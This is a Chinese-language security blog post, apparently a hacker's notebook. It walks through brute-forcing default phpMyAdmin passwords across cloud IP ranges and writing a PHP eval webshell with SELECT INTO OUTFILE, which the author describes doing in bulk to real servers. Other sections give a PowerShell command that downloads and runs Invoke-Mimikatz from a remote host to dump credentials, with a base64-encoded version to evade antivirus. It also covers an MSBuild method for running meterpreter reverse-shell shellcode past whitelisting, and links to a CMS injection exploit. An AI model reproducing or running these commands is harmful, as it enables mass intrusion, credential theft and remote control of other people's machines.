分类 网络安全 下的文章

上一篇文章说篇幅太少,其实操作就那样,没必要一步一步的说明,有的朋友给我发邮件私聊了下,很简单就复现了。

接下来正文,之前发现某些免流脚本,都是默认密码,数据库管理都是phpmyadmin,lnmp自动安装的,有些选项都没有让用户自己填写,导致了批量shell。简介就是这样。坛子里好像是有过入侵的,不过是通过burp爆破phpmyadmin。通用了一下,大家就明白了吧。
首先我了解到免流的web服务通常使用1234端口和808端口,那么开始找腾讯云的ip段进行扫描。

QQ20190331-132728@2x.png

扫描后复制下来保存到记事本中,批量处理下后缀名。
QQ20190331-132735@2x.png
保存ip之后导入,设置用户名,密码字典等。
QQ20190331-132742@2x.png
QQ20190331-132750@2x.png
开始爆破。
爆破之后导出ip和密码
QQ20190331-132800@2x.png
之前有过某个做黑产的牛发的扫过的。
逐条打开测试
QQ20190331-132809@2x.png
登陆phpmyadmin
点击sql,既然是mysql的root权限,那就可以通过找到绝对路径后写shell,
而脚本安装都是统一的目录,而且安装的是lnmp环境。So

 select '<?php @eval($_POST[1111])?>' into outfile '/home/wwwroot/default/admin/index1.php'

一句话写入,这样的话可以用菜刀连接了
QQ20190331-132818@2x.png

这是之前搞得12月份的批量,基本两个小时。

绕过杀毒执行ps-实现无文件落地导hash

直接执行。三款国内杀毒只有360拦截了执行。
powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://xxxx.xx/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds"
QQ20190330-235519@2x.png
Base64编码后执行
$text = 'Hello World!'

替换Hello World!

powershell.exe -eNco SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA=

替换后执行。
QQ20190331-131609@2x.png
绕过并导出了hash。这个办法在2008、win7上遇到装有360等国内杀毒的时候可以尝试下

Msbuild 利用reverse-shell

msbuild简介:
Microsoft Build Engine是一个用于构建应用程序的平台。 该引擎(也称为MSBuild)为控制构建平台如何处理和生成软件的项目文件提供了一个xm l schema。 ... Visual Studio 中的项目文件(.csproj、.vbproj、vcxproj 等)含有相应的MSBuild xm l 代码。
利用思路:
Msbuild从.net4.0中可以嵌入执行C#代码,所以可以将xml文件通过msbuild编译执行xml当做shellcode启动器。
使用Msfvenom生成CSharp shellcode
使用MSBuild平台将shellcode启动器其编译为可执行程序。
绕过av白名单,可以获得受害者机器的反向shell。
1、构造1.csproj(等待编译的文件)
文件内容:
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml
生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.99.178 lport=1233 -f csharp
QQ20190330-235519@2x.png
并将生成的shellcode复制到xml中原shellcode段。
注意这里讲buf改成shellcode。
从攻击机中监听1233端口。等待反向连接
QQ20190330-235540@2x.png
QQ20190330-235550@2x.png

可以看到已经成功反弹meterpreter。三款杀毒均未报毒。

看到三好学生以前的文章,还可以执行ps命令和mimikatz
相关代码在上面
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml
可以通过这样混淆来bypass av。

参考:
https://3gstudent.github.io/3gstudent.github.io/Use-MSBuild-To-Do-More/
https://www.hackingarticles.in/bypass-application-whitelisting-using-msbuild-exe-multiple-methods/

自动注入脚本aspcms利用
本来是个师傅共享在ichunqiu的,结果因为编码转码问题用的是py3写的。原文链接:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=41269

我的设备从树莓派到deepin都是默认py2,很不方便的说,所以就修改了下,把编码解决了。

这是url采集:https://github.com/knickersgod/python-tools/blob/master/aspcms-url.py
这是exp:https://github.com/knickersgod/python-tools/blob/master/aspects-exp.py

图片5.png
图片6.png
图片7.png

Awd脚本说明记录
1、Monitor
封装好的直接运行,作用目录是/var/www/html

/usr/local/lib/python2.7/site-packages/

monitor使用
创建文件删除,修改文件有提示。
图片13.png
图片14.png

2、waf生成日志被删除。
图片15.png
修改日志生成路径。
图片16.png
图片17.png
图片18.png
3、weblogger
将weblogger上传到网站目录下,可以改名,随意。
图片20.png
访问/weblogger/install.php
图片21.png
图片22.png
图片23.png
图片24.png
图片25.png
有黑白名单设置,有wef,可以自己构造出poc,在kali下可以直接运行。
如果需要放行对方或者自己ip
图片26.png
执行

echo  ‘’ > /tmp/xxxxxxx/hhhhblacklist就可以放行了
find /var/www/html/ -type f -path "*.php" | xargs sed -i "s/<?php/<?php\nrequire_once('\/tmp\/98366ed74d36da9dd6c07cc3aacc0c80\/weblogpro.php');\n/g"

将网站目录下所有php文件挂上waf